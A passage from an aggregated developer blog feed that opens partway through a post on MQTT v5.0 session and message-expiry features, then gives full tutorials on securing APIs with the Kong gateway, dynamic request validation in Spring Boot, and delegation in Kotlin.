In MQTT v3.1.1 and earlier, a client can control how the server handles the client session (a session means the subscriptions of a client and any queued messages) via the „clean session“ flag. If set to 1, the server would delete any existing session for that client and would not persist the session after disconnecting. If set to 0, the server would restore any existing session for a client when it reconnected, and persist the session when the client disconnected.

“Clean Session” is now split into “Clean Start”, which, if set to 1, indicates that the session should start without using an existing session (otherwise session information is kept), and a Session Expiry Interval, which says how long to retain the session after a disconnect.

  • Session Expiry is an optional part of the CONNECT message (3.1.2.11.2 Session Expiry Interval) and the DISCONNECT control packet (3.14.2.2.2 Session Expiry Interval). If the Session Expiry Interval is absent in the DISCONNECT message, the Session Expiry Interval in the CONNECT packet is used. It defines the session expiry interval in seconds. If set, the broker expires the session after the given interval as soon as the client disconnects. Setting Clean Start to 1 and Session Expiry Interval to 0 is equivalent to setting Clean Session to 1 in MQTT v3.1.1.
  • Message expiry is an optional part of the PUBLISH control packet (3.3.2.3.3 Publication Expiry Interval). The Publish Expiry Interval applies to online and queued messages and is the lifetime of the publication in seconds.

Another issue to be addressed under this banner is called Simplified State Management.
This has at least two major advantages.

  1. As an application, I only want my session state to be discarded when I’ve completed all my work, not when my network connection fails. This was inconveniently hard in all previous versions of MQTT – not in version 5.
  2. The ability for session state to have an expiry time. If the client does not connect within a certain amount of time, the session state can be deleted by the server. This obviates the need for a client to reconnect just to clean up session state.

Repeated topics when publishing

When publishing data to a single topic, a new feature will help reduce bandwidth use. A client or server can set the topic in a PUBLISH message to be a zero length string. This tells the client/server being published to, to use the previous topic instead. This goes some way to reducing the current overhead associated with publishing – a shame it isn’t quite as good as the registered topics available in MQTT-SN.

Publication Expiry interval

This is an identifier/value pair for use when publishing. If present, this value is a 4 byte integer which gives the number of seconds for which the server will attempt to deliver this message to a subscriber. This means that an offline client with messages being queued may not receive all of the messages when it reconnects, due to some of them expiring. Interestingly, when the server does deliver a message that had a Publication Expiry set, it sets the Publication Expiry on the outgoing message to the client but with the amount of time that there is left until the message expires. This means that the true time to expiry will propagate through bridges or similar.

Publish Reason Codes

The PUBACK and PUBREC packets have a new entry in their variable header which is the Publish Reason Code. This can be used to tell the client a message has been:

  • refused for various reasons
  • accepted, or
  • accepted with no matching subscribers.

For the PUBREC packet, if the message is refused or accepted with no matching subscribers then there is no expectation for the PUBREL/PUBCOMP messages to be sent for that message.
The PUBCOMP packet also has a similar entry which has the same set of Reason Codes and an additional one for the case when a message had expired.
This is for the case when a client reconnects with clean start set to 0 and it has a QoS 2 message part way through its handshake, but the server has already expired the message.
There is still no way to tell a client that its QoS 0 message was refused, but for a good reason: QoS 0 messages do not get an acknowledgement, so there is nothing to piggyback a Reason Code on!

Disconnect notification

In MQTT v3.1.1 and before, only the client sends a DISCONNECT packet.
In MQTT v5.0, either the client or the server can send DISCONNECT, and it is used to indicate a reason for disconnection.
Examples for the new disconnect reason codes:

Disconnect Reason Codes

Client implementations

Currently there is no ready-to-use MQTT v5.0 client implementation available. I think a production-ready version will not be available until mid-2018.

Anyway, as soon as client implementations are available, I am looking forward to adding support for the new Version 5.0 features to MQTT.fx (www.mqttfx.org) in time.

Links

OASIS Message Queuing Telemetry Transport (MQTT) TC

https://www.oasis-open.org/committees/tc_home.php?wg_abbrev=mqtt

Latest specification version

http://docs.oasis-open.org/mqtt/mqtt/v5.0/

MQTT.fx

http://www.mqttfx.org

The post Hello MQTT Version 5.0! appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

API management with Kong

codecentric Blog - Thu, 23-Nov-17 01:15

Utilising APIs to foster innovation and to create new business opportunities is not a new concept. A lot of success stories from eBay, Netflix, Expedia, mobile.de, and many others show the growing trend of API-driven business models. Most of the vendors for API management solutions are well-known players, such as IBM, Oracle, or MuleSoft, that try to provide a solution coupled to their existing ecosystem of enterprise products. One of the few exceptions is Kong Inc (formerly known as Mashape Inc), a San Francisco-based startup that became popular in the last two years by open-sourcing their core business product: Kong API gateway. In this article, I will briefly introduce the topic of API management and show how to bootstrap and use Kong API gateway.

Why does API management matter?

Adaptation and speed have become the key success factors in the software industry. We can see the results of this trend in the emergence of microservices architectures, continuous delivery, DevOps culture, agile software development, and cloud computing. In order to be fast, you have to split a system into encapsulated services and be able to change each part of the system in an instant. This trend also results in high demand for integration solutions between different applications and services. API management plays an important role in this integration by providing clear boundaries and abstractions between systems. Today we generate value by combining different services instead of building our own solutions. This is why cloud computing and SaaS applications are very popular. With the growing trend of APIs, many companies adjusted their business model, and some even moved to an API-centric business approach completely. Expedia Inc generates 90% of its revenue through Expedia Affiliate Network, an API platform. Netflix has built an ecosystem of over 1000 APIs to support multiple devices for their streaming platform. Salesforce, one of the fastest growing CRM vendors, generates over 50% of its revenue with APIs. Other common use cases for APIs are:

  • reach users or acquire content
  • generate traffic
  • expand partner network
  • find new business opportunities
  • create new revenue streams
  • support multiple devices
  • create flexibility for internal projects
  • provide integration capabilities with other systems

But utilising APIs is not easy and it comes at a price. The cost of the mentioned benefits is increased technical and organisational complexity. In this blog post we will explore ways to tackle the technical complexity and see how Kong API gateway can help deal with it.

Kong Architecture

Kong is an open source API gateway to manage RESTful APIs. It is part of Kong Enterprise, a bundle of Kong API gateway, a developer portal called Gelato and an analytics platform by the name of Galileo. It is aimed for enterprise customers that run thousands of APIs and require dedicated 24/7 support. For small to medium-sized companies, Kong API gateway (community edition) will suffice to make first steps in API management.

Kong Architecture with five core components.

The five components of the Kong architecture are nginx, OpenResty, the datastore, plugins and a RESTful admin API.

The core low-level component is nginx, a well-known and rock-solid web server. By 2017, 35.5% of all known and 54.2% of the top 100,000 websites worldwide use nginx. It can handle up to 10,000 simultaneous connections on one node with a low memory footprint and is often used as a reverse proxy in microservice architectures, a load balancer, an SSL termination proxy, or a static content web server. Apart from these use cases, nginx has many more features which deserve their own blog posts.

OpenResty is a web platform that glues together the nginx core, LuaJIT, Lua libraries and third-party nginx modules to provide a web server for scalable web applications and web services. It was originally built by taobao.com, the biggest online auction platform in Asia with 369 million active users (2017), and donated in 2011. After that, Cloudflare Inc. supported and developed the platform until 2016. Since then, the OpenResty Software Foundation has ensured the future development of the platform.

The datastore component uses Apache Cassandra or PostgreSQL to handle the storage of the configuration data, consumers, and plugins of all APIs. The API configuration is also cached within nginx, so the database traffic should be low.

Plugins are Lua modules that are executed during the request/response lifecycle. They enrich the API gateway with functionality for different use cases. For instance, if you want to secure your API, you would use a security plugin dedicated to providing only this functionality during the request. The Kong plugin system is open, and you can write your own custom plugins.

Finally, there is a RESTful admin API to manage the APIs. It may feel strange at the beginning to have no user interface. From a developer perspective, this is actually nice, because it provides a necessary tool to automate your workflows, for example with Postman, httpie or curl. Working with Kong for several months now, I have never felt the need for a user interface because I could access all information in a fast and reliable way. But if you want to have a nice dashboard for your APIs, you can use Konga or kong-dashboard, both free and open source community projects.

Now let’s see how to manage APIs with Kong and which plugins provide basic security features.

Kong API gateway in action

This part will be more technical than the previous one. First, I will show you how to create a minimal infrastructure for the Kong API gateway. Then I will add an API and a security plugin to restrict access to a specific user.

To start the infrastructure, I will use docker-compose with this service definition:

version: '2.1'

services:
  kong-database:
    container_name: kong-database
    image: postgres:9.4
    environment:
      - POSTGRES_USER=kong
      - POSTGRES_DB=kong
    healthcheck:
      test: ["CMD", "pg_isready", "-U", "postgres"]
      interval: 10s
      timeout: 5s
      retries: 5
  
  kong-migration:
    image: kong
    depends_on:
      kong-database:
        condition: service_healthy
    environment:
      - KONG_DATABASE=postgres
      - KONG_PG_HOST=kong-database
    command: kong migrations up

  kong:
    container_name: kong
    image: kong:0.11.0
    depends_on:
      kong-database:
        condition: service_healthy
      kong-migration:
        condition: service_started
    environment:
      - KONG_DATABASE=postgres
      - KONG_PG_HOST=kong-database
      - KONG_PG_DATABASE=kong
    expose:
      - 8000
      - 8001
      - 8443
      - 8444
    ports:
      - "8000-8001:8000-8001"
    healthcheck:
      test: ["CMD-SHELL", "curl -I -s -L http://127.0.0.1:8000 || exit 1"]
      interval: 5s
      retries: 10

You can also install Kong on many different platforms such as AWS, Google Cloud, Kubernetes, DC/OS and many others. In my docker-compose definition, there are three services: kong-database, kong and kong-migration. I use the PostgreSQL Docker image for the Datastore component that was mentioned in the architecture overview, but you can use Cassandra as well. The kong service exposes four different ports for two purposes:

  • 8000, 8443: HTTP & HTTPS access to the managed APIs (consumer endpoint)
  • 8001, 8444: HTTP & HTTPS access to the admin API (administration endpoint)

The kong-migration service is used to create the database user and tables in kong-database. This bootstrap functionality is not provided by the kong service itself, so you need to run kong migrations up within a container only once. With docker-compose up the services will be up and running. Your docker ps command should output something like this:

CONTAINER ID        IMAGE               COMMAND                  CREATED                  STATUS                            PORTS                                                                NAMES
87eea678728f        kong:0.11.0         "/docker-entrypoin..."   Less than a second ago   Up 2 seconds (health: starting)   0.0.0.0:8000-8001->8000-8001/tcp, 0.0.0.0:8443-8444->8443-8444/tcp   kong
4e2bf871f0c7        postgres:9.4        "docker-entrypoint..."   3 hours ago              Up 4 minutes (healthy)            5432/tcp                                                             kong-database

Now check the status by sending a GET request to the admin API. I use the tool HTTPie for this, but you can run a curl command or use Postman as an alternative.

$ http localhost:8001/apis/

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Connection: keep-alive
Content-Type: application/json; charset=utf-8
Date: Fri, 13 Oct 2017 14:59:25 GMT
Server: kong/0.11.0
Transfer-Encoding: chunked

{
    "data": [],
    "total": 0
}
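
For reference, the same check with curl (the -i flag includes the response headers) would be:

$ curl -i http://localhost:8001/apis/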

The Kong admin API is working, but there are no APIs configured. Let’s add an example:

$ http post localhost:8001/apis/ name=example_api upstream_url=https://example.com uris=/my_api

HTTP/1.1 201 Created
Access-Control-Allow-Origin: *
Connection: keep-alive
Content-Type: application/json; charset=utf-8
Date: Fri, 13 Oct 2017 15:03:55 GMT
Server: kong/0.11.0
Transfer-Encoding: chunked

{
    "created_at": 1507907036000,
    "http_if_terminated": false,
    "https_only": false,
    "id": "59d9749b-694a-4645-adad-d2c974b3df76",
    "name": "example_api",
    "preserve_host": false,
    "retries": 5,
    "strip_uri": true,
    "upstream_connect_timeout": 60000,
    "upstream_read_timeout": 60000,
    "upstream_send_timeout": 60000,
    "upstream_url": "https://example.com",
    "uris": [
        "/my_api"
    ]
}

Simply make a POST request to localhost:8001/apis/ with three mandatory parameters in the http body:

  • name: the API name
  • upstream_url: the target URL that points to your API server
  • uris: URI prefixes that point to your API

There are of course more parameters for SSL, timeouts, HTTP methods, and others; you will find them in the documentation if you want to tinker with them. A sketch of such a call follows below.
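
As an illustration only, a variant that sets a few of the optional fields visible in the response above (https_only, retries, upstream_connect_timeout) could look like this; the API name secure_api and the URI /secure are made up for the example, and the exact parameter handling should be checked against the Kong documentation (the := syntax is HTTPie's way of sending non-string JSON values):

$ http post localhost:8001/apis/ name=secure_api upstream_url=https://example.com uris=/secure https_only:=true retries:=3 upstream_connect_timeout:=30000

Now call the API: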

$ http localhost:8000/my_api

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Connection: keep-alive
Content-Encoding: gzip
Content-Length: 606
Content-Type: text/html; charset=UTF-8
Date: Tue, 17 Oct 2017 09:02:26 GMT
Etag: "359670651+gzip"
Expires: Tue, 24 Oct 2017 09:02:26 GMT
Last-Modified: Fri, 09 Aug 2013 23:54:35 GMT
Server: ECS (dca/249F)
Vary: Accept-Encoding
Via: kong/0.11.0
X-Cache: HIT
X-Kong-Proxy-Latency: 592
X-Kong-Upstream-Latency: 395




    Example Domain
...

In many cases you want to protect your API and give access only to dedicated users, so let’s see how Kong consumers and plugins work.

Consumers and Plugins

Consumers are objects that represent the (technical) users of an API. The data structure is rather simple, with just three fields: id, username and custom_id. To create a consumer, send a POST request to localhost:8001/consumers/:

$ http post localhost:8001/consumers/ username=John

HTTP/1.1 201 Created
Access-Control-Allow-Origin: *
Connection: keep-alive
Content-Type: application/json; charset=utf-8
Date: Tue, 17 Oct 2017 10:06:19 GMT
Server: kong/0.11.0
Transfer-Encoding: chunked

{
    "created_at": 1508234780000,
    "id": "bdbba9d1-5948-4e1a-94bd-55979b7117a3",
    "username": "John"
}

You have to provide a username, a custom_id, or both in the request body. The custom_id is meant for mapping a consumer to a user of your internal system, for example an ID in your CRM system; use it to maintain consistency between Kong consumers and your source of truth for user data.

I will now add a security plugin to my API and link the consumer to it. This will ensure that only this consumer can access the API with a specific key. A Kong plugin is a set of Lua modules that are executed during the request-response lifecycle of an API. You can add a plugin to all APIs, restrict it to a specific API, or to a specific consumer. In my case I will add the key authentication plugin:

$ http post localhost:8001/apis/example_api/plugins name=key-auth

HTTP/1.1 201 Created
Access-Control-Allow-Origin: *
Connection: keep-alive
Content-Type: application/json; charset=utf-8
Date: Tue, 17 Oct 2017 11:59:16 GMT
Server: kong/0.11.0
Transfer-Encoding: chunked

{
    "api_id": "36d04e5d-436d-4132-abdc-e4d42dc67068",
    "config": {
        "anonymous": "",
        "hide_credentials": false,
        "key_in_body": false,
        "key_names": [
            "apikey"
        ]
    },
    "created_at": 1508241556000,
    "enabled": true,
    "id": "8eecbe27-af95-49d2-9a0a-5c71b9d5d9bd",
    "name": "key-auth"
}

The API name example_api in the request URL restricts the plugin execution to this API only. Now if I try to use the API, the response will be:

$ http localhost:8000/my_api

HTTP/1.1 401 Unauthorized
Connection: keep-alive
Content-Type: application/json; charset=utf-8
Date: Tue, 17 Oct 2017 12:03:24 GMT
Server: kong/0.11.0
Transfer-Encoding: chunked
WWW-Authenticate: Key realm="kong"

{
    "message": "No API key found in request"
}

Now I need to create a key for my consumer:

$ http POST localhost:8001/consumers/John/key-auth key=secret_key

HTTP/1.1 201 Created
Access-Control-Allow-Origin: *
Connection: keep-alive
Content-Type: application/json; charset=utf-8
Date: Tue, 17 Oct 2017 12:35:11 GMT
Server: kong/0.11.0
Transfer-Encoding: chunked

{
    "consumer_id": "bdbba9d1-5948-4e1a-94bd-55979b7117a3",
    "created_at": 1508243712000,
    "id": "02d2afd6-1fb6-4713-860f-704c52355780",
    "key": "secret_key"
}

If you omit the key field, Kong will generate a random key for you. Now call the API with the created key:

$ http localhost:8000/my_api apikey=='secret_key'

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Connection: keep-alive
Content-Encoding: gzip
Content-Length: 606
Content-Type: text/html; charset=UTF-8
Date: Tue, 17 Oct 2017 12:40:46 GMT
Etag: "359670651+gzip"
Expires: Tue, 24 Oct 2017 12:40:46 GMT
Last-Modified: Fri, 09 Aug 2013 23:54:35 GMT
Server: ECS (dca/249B)
Vary: Accept-Encoding
Via: kong/0.11.0
X-Cache: HIT
X-Kong-Proxy-Latency: 25
X-Kong-Upstream-Latency: 374




    Example Domain
...

Pass the apikey as a query parameter or as a header in your API call. The plugin also offers configuration options, for example to hide the credential from the upstream request (hide_credentials) or to accept the key under different parameter names (key_names). It is also possible to configure plugins on the consumer level, so each consumer gets their own settings. For example, you can create different rate limits for your consumers, so that some of them can access your API more frequently than others.
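
For example, to give the consumer John an individual rate limit on example_api, a sketch could look like this; the rate-limiting plugin and its config.minute field should be verified against the Kong plugin documentation for your version, and --form sends the parameters form-encoded, mirroring the style of the official admin API examples:

$ http --form post localhost:8001/apis/example_api/plugins name=rate-limiting consumer_id=bdbba9d1-5948-4e1a-94bd-55979b7117a3 config.minute=5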

Summary

In this blog post I have introduced the topic of APIs and why it could matter for your business. The Kong API gateway is a great open-source project that can help you manage APIs for free. With just a few HTTP requests, we have created and secured our first API. The RESTful admin API of Kong is clean and simple, which allows for fast integration into most continuous delivery pipelines. In the upcoming blog post I will show you how to build your own plugin and use an OpenID provider to manage API access.

The post API management with Kong appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

Dynamic Validation with Spring Boot Validation

codecentric Blog - Wed, 22-Nov-17 01:30

Server-side validation is not only a way to prevent possible attacks on a system, it also helps to ensure data quality. In the Java environment, JSR 303 Bean Validation and the javax.validation packages provide developers with a standardized way of doing so. Fields that have to fulfill certain criteria receive the corresponding annotations, e.g. @NotNull, and these are then evaluated by the framework. Naturally, for checking more specific conditions, there is the possibility of creating custom annotations and validators.

The Spring framework has a good Bean Validation integration. For example, it is possible to validate an incoming request inside a RestController by adding the @Valid annotation to the request parameter. This ensures that the incoming object is validated. A simple example is the following controller:

@RestController
public class DataController {
    @RequestMapping(value = "/input", method = RequestMethod.POST)
    public ResponseEntity<?> acceptInput(@Valid @RequestBody Data data) {
        dataRepository.save(data);
        return new ResponseEntity<>(HttpStatus.OK);
    }
}

When entering the method, the very generic “Data” object has already been completely validated. If a field inside it wasn’t valid, the client would receive a 4xx status code.

Still, there is one disadvantage when using the validations: the annotations are completely static. It is not possible to read information e.g. from the request. Nevertheless, there are ways and means to overcome this limitation and enrich one’s own application with more dynamic validations. To be more specific, we want to extract one or more values from the incoming HttpRequest and vary the validation depending on the values.

More dynamic validation

Not so long ago, a joke went around regarding a famous social media platform’s character limit. This picture provides a very nice summary.

Our example application shall be based on this use case. When our application receives a request that has the language de-DE set in its header, the text inside the JSON payload is allowed to be 280 characters long. For every other language we enforce a limit of 140 characters. In order to demonstrate the combination with static validation, the DTO contains a number field, which is being validated, too. More precisely, the object looks like this:

public class Data {
    @NotNull
    private final String someStringValue;
    @Min(1)
    private final int someIntValue;

    @JsonCreator
    public Data(@JsonProperty("someStringValue") String someStringValue, @JsonProperty("someIntValue") int someIntValue) {
        this.someStringValue = someStringValue;
        this.someIntValue = someIntValue;
    }

    public String getSomeStringValue() {
        return someStringValue;
    }

    public int getSomeIntValue() {
        return someIntValue;
    }
}

The JSON annotations come from Jackson and are already included in Spring Boot Starter Web, which is quite practical for our example. The someStringValue, which already has an annotation, shall be the field we use for checking the character limit.

For the validation we need a custom class containing the logic:

@Component
public class StringValueValidator {

    public void validate(String language, Data data, Errors errors) {
        if (!"de-DE".equals(language)) {
            if (data.getSomeStringValue().length() > 140) {
                errors.reject("someStringValue");
            }
        }
    }
}

I would like to emphasize here that the validator class does not implement any javax.validation interface, not even javax.xml.validation.Validator. This is because the validation depends on values from the request and is supposed to take place after the rest of the validation. Still, we want to utilize the existing checks (@NotNull and @Min). Except for the @Component annotation, the StringValueValidator is a POJO.

The Errors object originates from Spring and has the fully qualified name org.springframework.validation.Errors. As you can see, in case of a negative test result, we add the field that is being rejected to the Errors. It is also possible to add a more specific error message there.
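
For example, instead of the bare errors.reject(...) above, a field-level error with an explicit default message could be registered like this (the error code someStringValue.tooLong is made up for this sketch):

if (data.getSomeStringValue().length() > 140) {
    errors.rejectValue("someStringValue", "someStringValue.tooLong",
            "someStringValue must not exceed 140 characters for this language");
}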

Only using the @Valid annotation in the controller is not sufficient anymore; the existing errors are also needed as an additional parameter. By adding Errors to the parameter list, Spring recognizes that it should not reject the request immediately and instead passes the existing validation errors into the method. We have to be careful here, because Spring will no longer send an automatic 4xx response in case of validation errors. We are now responsible for returning the appropriate status code ourselves.

In addition to the errors, we let Spring extract the language from the header. Of course, we could access the HTTP request directly here, but this way we save some effort. The language, the data, and the existing errors are then passed to our StringValueValidator. The complete request method looks like this:

    @RequestMapping(value = "/validation", method = RequestMethod.POST)
    public ResponseEntity<?> acceptData(@Valid @RequestBody Data data, Errors errors, 
        @RequestHeader(HttpHeaders.ACCEPT_LANGUAGE) String language) {
        stringValueValidator.validate(language, data, errors);
        if (errors.hasErrors()) {
            return new ResponseEntity<>(createErrorString(errors), HttpStatus.BAD_REQUEST);
        }
        return new ResponseEntity<>(HttpStatus.OK);
    }
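
The createErrorString method used above is not provided by Spring; a minimal sketch that simply joins the codes of all registered errors (it additionally needs imports for org.springframework.validation.ObjectError and java.util.stream.Collectors) could look like this:

    private String createErrorString(Errors errors) {
        // Collect the error codes of all global and field errors into one comma-separated string.
        return errors.getAllErrors().stream()
                .map(ObjectError::getCode)
                .collect(Collectors.joining(", "));
    }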

We now have a dynamic validation that adapts its behaviour to the request. The language serves only as an example placeholder for any value that could be inside the request. Alternatives could be the request URL or values inside the payload.

One of the curious things here is that one would expect to be able to make the validator a RequestScoped bean and then have it injected in the controller. Unfortunately, it was not possible for me to get this approach running. When testing with more than one request, the first one always got “stuck” inside the validator and the test then failed.

You can find the complete example project including unit tests on GitHub: https://github.com/rbraeunlich/spring-boot-additional-validation

Conclusion

As shown, it is possible to extend the validation of fields with dynamic aspects in a quite simple way. We were even able to combine our extended validation with the existing one without experiencing any constraints. Especially complex validations that cannot be represented by pure annotations can easily be added to a RestController in this way.

The post Dynamic Validation with Spring Boot Validation appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD

Elegant delegates in Kotlin

codecentric Blog - Wed, 15-Nov-17 01:11

Kotlin has given us some really killer features. Some are obviously useful (null safety), while others come with a warning, like operator overloading and extension functions. One such ‘handle-with-care’ feature is the language support for delegation. It’s easy to grasp, quick to apply and the manual literally takes half a page.

interface Base {
    fun print()
}

class BaseImpl(val x: Int) : Base {
    override fun print() { print(x) }
}

class Derived(b: Base) : Base by b

fun main(args: Array<String>) {
    val b = BaseImpl(10)
    Derived(b).print() // prints 10
}

The delegate pattern dips its feet in the murky waters of inheritance: it aims to extend the functionality of a class by delegating the call to a helper object with which it shares an interface. This is all very comparable to an inheritance relationship.

Imagine we have a bunch of Rest controllers and want to have all incoming JSON objects pass through a String sanitiser (never mind that there are better AOP based solutions; you get my drift). We also want to do some extra authentication stuff.

class EmployeeController @Autowired
                         constructor(sanitizer: StringSanitizerImpl,
                                     authenticator: AuthenticatorImpl) :
                                     StringSanitizer by sanitizer,
                                     Authenticator by authenticator

The good thing is that authenticator and sanitizer can be full-fledged Spring services, so the delegates can have their own @Autowired dependencies, something you could never achieve with plain inheritance, much less with Java’s default methods.
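
To make that concrete, here is a minimal sketch of what such a delegate could look like; the sanitize method and the ProfanityFilter collaborator are made up for this illustration:

interface StringSanitizer {
    fun sanitize(input: String): String
}

@Service
class ProfanityFilter {
    // Toy implementation, just so that there is something for Spring to inject.
    fun clean(input: String): String = input.replace("badword", "***")
}

@Service
class StringSanitizerImpl @Autowired constructor(
    private val profanityFilter: ProfanityFilter // the delegate's own Spring-managed dependency
) : StringSanitizer {
    override fun sanitize(input: String): String = profanityFilter.clean(input.trim())
}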

Great! Or is it? It is often said that you should favour composition over inheritance, and quite rightly so: inheritance shouldn’t be misused to pull in helper functionality from classes unless there is a clear IS-A relationship. A Book is a LibraryItem, but our EmployeeController is not really a StringSanitiser or an Authenticator. The only thing we have gained is not having to explicitly type the delegate references in the EmployeeController code — you could argue if that’s really a gain. But far worse is that we need to create interfaces just for the sake of delegation and that we expose the delegates’ API to the outside world, which is not what we want.

So: bad example.

You should use Kotlin delegation if you want to extend the behaviour of classes that you cannot or don’t want to subclass for a number of reasons:

  • They are final
  • You want to offer a limited or different API, using 98% of the existing code, basically an Adapter or Facade.
  • You want to hide the implementation from calling code, so they cannot cast to the superclass.

Suppose you have built a powerful library for creating Excel files that you want to use in various modules. Its API is quite extensive and low-level, i.e. not user-friendly. You also want to offer a pared-down version with fewer features and a simplified API. Subclassing won’t do: while you can override and add methods, the public API will only get larger. Here’s how you could handle it.

interface BasicExcelFacade {
    fun createCell(row: Int, column: Int): Cell
    /* imagine the interface has twenty more methods */
}

class FancyExcelLibrary : BasicExcelFacade {
    fun createColor(color: Colors): Color {
        return Color(color)
    }

    override fun createCell(row: Int, column: Int): Cell = Cell(row, column)
}

class SimpleExcelLibrary(private val impl: FancyExcelLibrary) : BasicExcelFacade by impl {
    fun colorCellRed(row: Int, column: Int) {
        // createCell is automatically delegated to impl, like all the other twenty methods
        val cell = createCell(row, column)
        // createColor is not in the BasicExcelFacade, so we invoke the implementation directly
        cell.color = impl.createColor(Colors.RED)
    }
}

class Color(val colors: Colors)
// color is nullable with a default value so that createCell can construct a Cell without a Color
class Cell(val row: Int, val col: Int, var color: Color? = null)
enum class Colors { RED }

You create a BasicExcelFacade interface with all the FancyExcelLibrary methods you want to expose in the simple API (say 40%) and have FancyExcelLibrary implement it. You create a SimpleExcelLibrary class that takes a FancyExcelLibrary reference on construction and you only need to write code for the extra methods: no boilerplate needed.

There is another example where Kotlin delegates are really useful and that is Spring Crud Repositories. They’re great when working with JPA entities and ORM. You extend an interface, parameterising the Entity class and its primary key class (usually a Long or a String). This is all it takes.

interface EmployeeDao : CrudRepository<Employee, Long>

You can then autowire the EmployeeDao into your code. The actual implementation is opaque and instantiated by the container: you cannot and should not subclass it, but sometimes it would be darn useful to tweak its behaviour. For instance, I found myself writing code like the following in most of the services that use the generated DAOs.

fun findByIdStrict(id: Long) = employeeDao.findOne(id) ?: throw NotFoundException("no Employee with id $id")

All I wanted was to throw an exception when an entity cannot be found and to utilise Kotlin null safety in the return type of the findOne method, instead of having to handle ugly NullPointerExceptions.

So we can’t subclass the generated DAO, but we can sure delegate to it.

@Service
class ActorRepository @Autowired constructor(val actorDao: ActorDao) : ActorDao by actorDao {
    fun removeById(id: Long) = delete(findById(id))
    fun findById(id: Long): Actor = findOne(id) ?: throw NotFoundException("No actor with id $id")
    override fun findByNameAndAccount(name: String, account: String): Actor =
        actorDao.findByNameAndAccount(name, account) ?: throw NotFoundException("Actor name unknown $name")
}

There is zero code duplication and no boilerplate! This is actual code from my open source hobby project kwinsie.com, by the way; just in case you are wondering, the Actors are not Akka actors but theatre actors. Ever wondered what this would look like in plain old Java? Just load the generated class file and decompile it.

Here is the decompiled result: a heck of a lot of boilerplate you never have to see again… Happy Kotlin coding!

@NotNull
private final ActorDao actorDao;

public final void removeById(long id) {
    this.delete(this.findById(id));
}

@NotNull
public final Actor findById(long id) {
    Actor var10000 = this.findOne(id);
    if (var10000 != null) {
        return var10000;
    } else {
        throw (Throwable)(new NotFoundException("No actor with id " + id));
    }
}

@NotNull
public Actor findByNameAndAccount(@NotNull String name, @NotNull String account) {
    Intrinsics.checkParameterIsNotNull(name, "name");
    Intrinsics.checkParameterIsNotNull(account, "account");
    Actor var10000 = this.actorDao.findByNameAndAccount(name, account);
    if (var10000 != null) {
        return var10000;
    } else {
        throw (Throwable)(new NotFoundException("Actor name unknown " + name));
    }
}

@NotNull
public final ActorDao getActorDao() {
    return this.actorDao;
}

@Autowired
public ActorRepository(@NotNull ActorDao actorDao) {
    Intrinsics.checkParameterIsNotNull(actorDao, "actorDao");
    super();
    this.actorDao = actorDao;
}

public long count() {
    return this.actorDao.count();
}

public void delete(Long p0) {
    this.actorDao.delete((Serializable)p0);
}

The post Elegant delegates in Kotlin appeared first on codecentric AG Blog.

Categories: Agile, Java, TDD & BDD
